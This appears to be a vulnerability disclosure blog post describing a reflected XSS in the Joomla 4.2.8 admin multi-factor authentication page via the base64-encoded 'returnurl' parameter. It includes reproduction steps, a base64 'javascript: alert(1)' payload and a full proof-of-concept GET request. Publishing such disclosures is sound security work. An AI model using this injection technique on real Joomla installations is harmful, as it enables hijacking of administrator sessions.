Live in the shadow

0%

Joomla V4.2.8 Backend Reflected-XSS

发表于 分类于
Joomla-V4.2.8 with Reflected-XSS in backend /administrator/index.php.

Description

Admin backend Multi-factor Authentication component with reflected-XSS via base64-encoded GET parameters returnurl.

Affected Version

Joomla <= 4.2.8

POC

  1. Login to Joomla CMS admin backend management, enter into the Multi-factor Authentication component.
  2. No matter add a new or edit an existed multi-factor authentication method, there is always a base64-encoded URL parameter returnurl.
  3. The value of returnurl will be decoded by base64 and appeared in html attribute href of <a> tag, which in the “Save & Close” and “Cancel” button.
  4. Change the value of returnurl to base64-encoded XSS payload, e.g. amF2YXNjcmlwdDphbGVydCgxKTs=, which is the javascript: alert(1), and request the page with returnurl parameter, the payload will be injected to the “href”.

Full POC request:

1
2
3
4
5
6
7
8
9
10
11
GET /joomla/administrator/index.php?option=com_users&task=method.add&method=yubikey&user_id=220&returnurl=amF2YXNjcmlwdDphbGVydCgxKTs%3D HTTP/1.1
Host: 127.0.0.1:80
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: atumSidebarState=open; 8bf89f010a5bbff54669e4ad47111f59=8nunecujukuvngvnu63fptrr0t; c04ce7edc2a8825a69f250555054fe73=ujj34jaqqm0md1cihnph0q3a20; PHPSESSID=enl8bvb5tmdfidt9kmvvekicr7
Connection: close

Reference

Reported by Srpopty, vulnerability discovered by using Corax.